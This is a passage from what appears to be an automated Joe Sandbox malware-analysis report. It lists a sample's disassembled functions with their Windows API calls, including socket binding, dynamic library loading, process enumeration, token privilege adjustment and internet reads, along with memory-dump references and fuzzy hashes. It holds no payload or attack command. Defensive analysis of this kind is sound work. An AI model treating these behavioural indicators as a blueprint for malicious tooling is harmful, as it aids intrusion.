                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00216AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00216B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00216B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00216B34
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 2d8c31020f1ea649008d9461956e65ef75a72121e6ef695efc761845562ed0c8
                                                            • Instruction ID: 440b2268a02deaeca06cff9f86f9ecba8b5a91fcf1543e6dadb6c1be2da3faf6
                                                            • Opcode Fuzzy Hash: 2d8c31020f1ea649008d9461956e65ef75a72121e6ef695efc761845562ed0c8
                                                            • Instruction Fuzzy Hash: 6841E339B00214AFEB10AF64DC86F6EB7E89F19724F04805CF90AAB3D2DB709D418791
                                                            Function 002255FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 7633ac052789a9819c0ac971726a351509cb778966258fff0ad33198d6e7ad92
                                                            • Instruction ID: 5bd096827c839691f8df73ee833242d6f349491ef33784522ad18e293da52a83
                                                            • Opcode Fuzzy Hash: 7633ac052789a9819c0ac971726a351509cb778966258fff0ad33198d6e7ad92
                                                            • Instruction Fuzzy Hash: 961190317109317BE7211FA6EC48B3BB7ADEF55721B848039E906D7251CB7099128AA4
                                                            Function 0020C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0020C69D
                                                            • CoCreateInstance.OLE32(00232D6C,00000000,00000001,00232BDC,?), ref: 0020C6B5
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • CoUninitialize.OLE32 ref: 0020C922
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 4384f184648ea5da8b38fcc4b35ccc1e43b8ced21ca96b30cce09f0da4a75e78
                                                            • Instruction ID: 0b60981c7723d2f961785b9b2cd04f9083c13655bf9cf1e71ae9cff0541b922d
                                                            • Opcode Fuzzy Hash: 4384f184648ea5da8b38fcc4b35ccc1e43b8ced21ca96b30cce09f0da4a75e78
                                                            • Instruction Fuzzy Hash: FBA13B75208305AFD700EF64C881EABB7ECEF95704F00496DF156971A2EB71EA49CB62
                                                            Function 0021C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001E1D88,?), ref: 0021C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0021C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: eaeafb94392474d1852f828a311802e31655b09b315896dc1d3621b67bc95aae
                                                            • Instruction ID: 5331eb86c514a618988719fc1935dc63c68dad9dc28b161adcf98abc5477fe27
                                                            • Opcode Fuzzy Hash: eaeafb94392474d1852f828a311802e31655b09b315896dc1d3621b67bc95aae
                                                            • Instruction Fuzzy Hash: 2CE08C78660313DFCB704F65E908A8676E4EB19705B908479E8AAD2260E770D8A1CA60
                                                            Function 001B3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: b618b29bd048053e9f6f242646d7beae176185a45f937a3ec26b3bf22e415182
                                                            • Instruction ID: e30389b1f8db8722833de7399824fa672c0d773979e32b2717d36daf4c743584
                                                            • Opcode Fuzzy Hash: b618b29bd048053e9f6f242646d7beae176185a45f937a3ec26b3bf22e415182
                                                            • Instruction Fuzzy Hash: 4522AB716087419FD724DF24C891BAFB7E5BF99300F10492DF9AA97291DB30EA44CB92
                                                            Function 0021F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0021F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0021F15F
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0021F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0021F22E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 6d465ba3c5710b6df88ee07f818e56c1c621668285380ccbf8b5998e217b5d15
                                                            • Instruction ID: ad37c28f7dcf6c04e6d1178a547f14b6631953e52f1b716aeedc6d109710a821
                                                            • Opcode Fuzzy Hash: 6d465ba3c5710b6df88ee07f818e56c1c621668285380ccbf8b5998e217b5d15
                                                            • Instruction Fuzzy Hash: 41519175508301AFD310EF20DC85EABB7E8FFA9710F50492DF495972A1EB709A44CB92
                                                            Function 001FEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001FEB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: c57ba5ca496348ef440792603291fa4707de0120a3f7d4058e5bcef3eb3be28a
                                                            • Instruction ID: ef3ea67f8d42c81c46706d5076f93ea5a1931ee57a5b8920990d6b1c035746de
                                                            • Opcode Fuzzy Hash: c57ba5ca496348ef440792603291fa4707de0120a3f7d4058e5bcef3eb3be28a
                                                            • Instruction Fuzzy Hash: 3E321575A007059FD728CF19C481A6AB7F1FF48320B15C56EE99ADB3A1EB70E981CB44
                                                            Function 002125E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002126D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0021270C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: e9b07278d3e5f45d5ba51a83547eda192d29f0f4c317f33accd8560356feaeeb
                                                            • Instruction ID: 6f2b905de3e4ac7546a388170a62c4d704fe4f909c0ca47d5b451e2dbc12495e
                                                            • Opcode Fuzzy Hash: e9b07278d3e5f45d5ba51a83547eda192d29f0f4c317f33accd8560356feaeeb
                                                            • Instruction Fuzzy Hash: 0E41D57152024AFFEB24DE94DC85EFBB7FCEB60314F10406EF601A6180EAB09DB99654
                                                            Function 0020B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0020B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0020B655
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: 15f388af5ee9e5941d998c37a5eba45c5619860515a72f15af01984d50c20573
                                                            • Instruction ID: 3155f25de49f3b530dfa4e3af324d24e285eb0d57914c08802f79907be84362a
                                                            • Opcode Fuzzy Hash: 15f388af5ee9e5941d998c37a5eba45c5619860515a72f15af01984d50c20573
                                                            • Instruction Fuzzy Hash: F3217135A10618EFCB00EFA5D885EADBBB8FF49310F1480A9E905EB361DB319956CF51
                                                            Function 001F8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C0FF6: std::exception::exception.LIBCMT ref: 001C102C
                                                              • Part of subcall function 001C0FF6: __CxxThrowException@8.LIBCMT ref: 001C1041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                            • GetLastError.KERNEL32 ref: 001F8D47
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: d462fdc7c092a3f8dc17c42443793cf3e054f2c34c6b826dd70133d5173942b6
                                                            • Instruction ID: 9f7a86bfc6cab6b54fd8f1156fc4cbfa2b7a19965a1c42156c9dfffa7cff667d
                                                            • Opcode Fuzzy Hash: d462fdc7c092a3f8dc17c42443793cf3e054f2c34c6b826dd70133d5173942b6
                                                            • Instruction Fuzzy Hash: 21116DB1414209AFD7289F94ED85D7BB7BCEB54710B20852EF45696241EB30A8418A60
                                                            Function 00204021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0020404B
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00204088
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00204091
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: 35c085cd58d6796f7a7d8af361ef1ad6e066875dd69379396c4c6dfa9810c6da
                                                            • Instruction ID: 7dff88e9e68f4680ebdaa4a941106022938731db6f42f43ec790fa8e9074a7be
                                                            • Opcode Fuzzy Hash: 35c085cd58d6796f7a7d8af361ef1ad6e066875dd69379396c4c6dfa9810c6da
                                                            • Instruction Fuzzy Hash: F11182B1D14329BEE7209BE8ED48FAFBBBCEB08710F004656BA04F7191C2B45D1587A1
                                                            Function 00204C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00204C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00204C43
                                                            • FreeSid.ADVAPI32(?), ref: 00204C53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 48723913ece8e8f7e443e5cea168d868b0cf31062f84e3d3ec0d75797335b9ad
                                                            • Instruction ID: 7b1e2fcb57adb563239f14f4f52eed2a883e5902fe1da40359e3e82bbbc16939
                                                            • Opcode Fuzzy Hash: 48723913ece8e8f7e443e5cea168d868b0cf31062f84e3d3ec0d75797335b9ad
                                                            • Instruction Fuzzy Hash: D4F03775A11309BBDB04DFE0AD89AAEBBB8EB08201F0044A9AA01E2181E6706A448B50
                                                            Function 00208B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 00208B25
                                                              • Part of subcall function 001C543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,002091F8,00000000,?,?,?,?,002093A9,00000000,?), ref: 001C5443
                                                              • Part of subcall function 001C543A: __aulldiv.LIBCMT ref: 001C5463
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0u&
                                                            • API String ID: 2893107130-1534014668
                                                            • Opcode ID: f39ecc155a1ec482a78ae2eba87a5969b7a7b97c6615475c00b320098682c1f5
                                                            • Instruction ID: 2e45564bcd0f5b787ec32acfd9f97e32360b412ec1b8710021ccbcf2f7726221
                                                            • Opcode Fuzzy Hash: f39ecc155a1ec482a78ae2eba87a5969b7a7b97c6615475c00b320098682c1f5
                                                            • Instruction Fuzzy Hash: D721E4726356108BC329CF25E441A52B3E1EBA5321B288E6CD4E6CB2D0DA74B945CB94
                                                            Function 001AE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f82f836850c06c23e5de6cc994a8662280981bbe25b9fc68a968144bdf952ad5
                                                            • Instruction ID: 290d7ba1d6b13bdbf10a9e4663c3c5d631321e620b75e602bc3b2f6156fac361
                                                            • Opcode Fuzzy Hash: f82f836850c06c23e5de6cc994a8662280981bbe25b9fc68a968144bdf952ad5
                                                            • Instruction Fuzzy Hash: AA22AE78A00216DFDB24DF54C494BBEBBF5FF1A300F14846AE856AB341E730A985CB91
                                                            Function 0020C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0020C966
                                                            • FindClose.KERNEL32(00000000), ref: 0020C996
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: c86d33be7bb18810d98a5f3aaadc6becfb7f526df8276d3a4c5bb91fae4b2bde
                                                            • Instruction ID: 8e8bdf8f356996385ad08d4d58a4a6f086d0cd941dbb12905c4e02c9c627b6da
                                                            • Opcode Fuzzy Hash: c86d33be7bb18810d98a5f3aaadc6becfb7f526df8276d3a4c5bb91fae4b2bde
                                                            • Instruction Fuzzy Hash: 3911C4766106149FD710EF29D849A3AF7E9FF95324F00865EF8A9D72A1DB30AC01CB81
                                                            Function 0020A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0021977D,?,0022FB84,?), ref: 0020A302
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0021977D,?,0022FB84,?), ref: 0020A314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 74b2c3d6437fd0b0c216f4d6343ce8878591610b31734c06c0e5ced2a084cc84
                                                            • Instruction ID: 57c6d847958bf0824c5fff0b609a6985639d7046487f5879afe20dc77403214d
                                                            • Opcode Fuzzy Hash: 74b2c3d6437fd0b0c216f4d6343ce8878591610b31734c06c0e5ced2a084cc84
                                                            • Instruction Fuzzy Hash: 7FF0E23555432DBBDB209FA4CC49FEA736DBF09761F0042A6B808D2181D7309A00CBA1
                                                            Function 001F8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F8851), ref: 001F8728
                                                            • CloseHandle.KERNEL32(?,?,001F8851), ref: 001F873A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
